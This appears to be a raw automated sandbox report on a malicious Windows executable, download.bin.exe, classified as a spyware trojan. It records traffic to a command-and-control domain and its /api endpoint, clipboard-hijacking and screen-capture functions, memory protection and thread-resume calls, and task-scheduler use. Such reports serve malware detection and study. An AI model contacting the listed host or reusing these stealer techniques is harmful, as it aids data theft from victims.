DNS traffic detected: DNS query: traygullibalkerj.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traygullibalkerj.click

Source: download.bin.exe, 00000000.00000002.1688842398.00000000015B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: download.bin.exe, 00000001.00000002.2928261672.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, download.bin.exe, 00000001.00000002.2927901414.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traygullibalkerj.click/
Source: download.bin.exe, 00000001.00000002.2928261672.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traygullibalkerj.click/&
Source: download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traygullibalkerj.click/5
Source: download.bin.exe, 00000001.00000002.2927901414.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, download.bin.exe, 00000001.00000002.2928245316.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traygullibalkerj.click/api
Source: download.bin.exe, 00000001.00000002.2928245316.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traygullibalkerj.click/apif
Source: download.bin.exe, 00000001.00000002.2927901414.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traygullibalkerj.click/apite
Source: download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traygullibalkerj.click:443/apiCEAF9E7737D9ECFd

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\download.bin.exe

Code function: 1_2_00436C60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00436C60

Source: C:\Users\user\Desktop\download.bin.exe

Code function: 1_2_030B1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

1_2_030B1000

Source: C:\Users\user\Desktop\download.bin.exe

Code function: 1_2_00436C60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00436C60

Source: C:\Users\user\Desktop\download.bin.exe

Code function: 1_2_00437449 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_00437449

Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_0583FA78 NtProtectVirtualMemory,	0_2_0583FA78
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D22120 NtResumeThread,	0_2_05D22120
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D2211B NtResumeThread,	0_2_05D2211B

Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_018421F0	0_2_018421F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_01842200	0_2_01842200
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_01842783	0_2_01842783
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05837128	0_2_05837128
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_0583D000	0_2_0583D000
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05834B88	0_2_05834B88
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05838A9B	0_2_05838A9B
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_0583CFF0	0_2_0583CFF0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_0583AE28	0_2_0583AE28
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05831378	0_2_05831378
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A57870	0_2_05A57870
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A57D53	0_2_05A57D53
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A561C8	0_2_05A561C8
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A561D8	0_2_05A561D8
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A5A8DB	0_2_05A5A8DB
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A50007	0_2_05A50007
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A57860	0_2_05A57860
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A50040	0_2_05A50040
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A572F7	0_2_05A572F7
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C04480	0_2_05C04480
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C0012A	0_2_05C0012A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C047B7	0_2_05C047B7
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C01088	0_2_05C01088
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C01078	0_2_05C01078
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C05A98	0_2_05C05A98
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C34558	0_2_05C34558
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C39B70	0_2_05C39B70
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D20040	0_2_05D20040
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D20007	0_2_05D20007
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D69580	0_2_05D69580
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6D518	0_2_05D6D518
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D63C18	0_2_05D63C18
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6C640	0_2_05D6C640
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6B8E0	0_2_05D6B8E0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6D508	0_2_05D6D508
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6C63B	0_2_05D6C63B
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6B8D1	0_2_05D6B8D1
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D640A1	0_2_05D640A1
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D63BF7	0_2_05D63BF7
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05E4E0E8	0_2_05E4E0E8
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05E30040	0_2_05E30040
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05E30007	0_2_05E30007
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05E3001F	0_2_05E3001F
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0040D02A	1_2_0040D02A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004088D0	1_2_004088D0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041F970	1_2_0041F970
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00443920	1_2_00443920
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004211F0	1_2_004211F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042F216	1_2_0042F216
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0040DA82	1_2_0040DA82
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00424B80	1_2_00424B80
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0040AC10	1_2_0040AC10
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00427E40	1_2_00427E40
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00415650	1_2_00415650
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041BE00	1_2_0041BE00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0040E627	1_2_0040E627
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00410EC3	1_2_00410EC3
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00442F50	1_2_00442F50
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043BF70	1_2_0043BF70
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00412730	1_2_00412730
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00406840	1_2_00406840
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00409870	1_2_00409870
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00406010	1_2_00406010
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041A820	1_2_0041A820
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0044B03A	1_2_0044B03A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0040F0F0	1_2_0040F0F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0040B090	1_2_0040B090
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004270B0	1_2_004270B0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042B153	1_2_0042B153
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00419930	1_2_00419930
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004309E3	1_2_004309E3
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004349E0	1_2_004349E0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004189EC	1_2_004189EC
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004251F0	1_2_004251F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041C1FF	1_2_0041C1FF
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00440990	1_2_00440990
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004219A0	1_2_004219A0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004311B8	1_2_004311B8
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00436A20	1_2_00436A20
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00442AC0	1_2_00442AC0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042E28A	1_2_0042E28A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041D290	1_2_0041D290
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043FA90	1_2_0043FA90
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043CAB0	1_2_0043CAB0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004402B0	1_2_004402B0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042E2B9	1_2_0042E2B9
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00405B50	1_2_00405B50
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0040CB57	1_2_0040CB57
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00402B70	1_2_00402B70
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041237B	1_2_0041237B
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043330F	1_2_0043330F
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043431D	1_2_0043431D
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00443320	1_2_00443320
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00428330	1_2_00428330
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041DBF0	1_2_0041DBF0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042FB83	1_2_0042FB83
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042B380	1_2_0042B380
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00429398	1_2_00429398
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004063B0	1_2_004063B0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00411BB6	1_2_00411BB6
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043B440	1_2_0043B440
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042844F	1_2_0042844F
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041741A	1_2_0041741A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0044241B	1_2_0044241B
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00409430	1_2_00409430
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00427430	1_2_00427430
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00429CE2	1_2_00429CE2
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041A4E0	1_2_0041A4E0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043D497	1_2_0043D497
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004204BD	1_2_004204BD
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00432545	1_2_00432545
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00414D00	1_2_00414D00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043CD00	1_2_0043CD00
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00442500	1_2_00442500
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00437D10	1_2_00437D10
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00434D10	1_2_00434D10
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00441DD1	1_2_00441DD1
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004435E0	1_2_004435E0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042F5EB	1_2_0042F5EB
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00415650	1_2_00415650
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00404E40	1_2_00404E40
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00442650	1_2_00442650
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00428E07	1_2_00428E07
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00407620	1_2_00407620
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041C620	1_2_0041C620
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041DE20	1_2_0041DE20
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00431E39	1_2_00431E39
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00416E3C	1_2_00416E3C
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0042B153	1_2_0042B153
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004426F0	1_2_004426F0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041D6A0	1_2_0041D6A0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043B6A0	1_2_0043B6A0
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00402F50	1_2_00402F50
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00421F60	1_2_00421F60
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0041CF70	1_2_0041CF70
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043A770	1_2_0043A770
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00442780	1_2_00442780
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0043AF8A	1_2_0043AF8A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00436790	1_2_00436790
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00425796	1_2_00425796

Source: C:\Users\user\Desktop\download.bin.exe	Code function: String function: 00414CF0 appears 89 times
Source: C:\Users\user\Desktop\download.bin.exe	Code function: String function: 004081D0 appears 38 times

Source: download.bin.exe, 00000000.00000002.1702508061.0000000004269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs download.bin.exe
Source: download.bin.exe, 00000000.00000002.1688842398.000000000150E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs download.bin.exe
Source: download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs download.bin.exe
Source: download.bin.exe, 00000000.00000002.1704193923.0000000005890000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameKolmrd.dll" vs download.bin.exe
Source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs download.bin.exe
Source: download.bin.exe, 00000000.00000002.1705279369.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs download.bin.exe
Source: download.bin.exe	Binary or memory string: OriginalFilenameNhvkbbbzwkq.exe8 vs download.bin.exe

Source: download.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: download.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Users\user\Desktop\download.bin.exe

Code function: 1_2_0043BF70 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_0043BF70

Source: C:\Users\user\Desktop\download.bin.exe

Mutant created: NULL

Source: download.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: download.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\download.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

File read: C:\Users\user\Desktop\download.bin.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\download.bin.exe "C:\Users\user\Desktop\download.bin.exe"
Source: C:\Users\user\Desktop\download.bin.exe	Process created: C:\Users\user\Desktop\download.bin.exe "C:\Users\user\Desktop\download.bin.exe"
Source: C:\Users\user\Desktop\download.bin.exe	Process created: C:\Users\user\Desktop\download.bin.exe "C:\Users\user\Desktop\download.bin.exe"	Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: amsi.dll	Jump to behavior
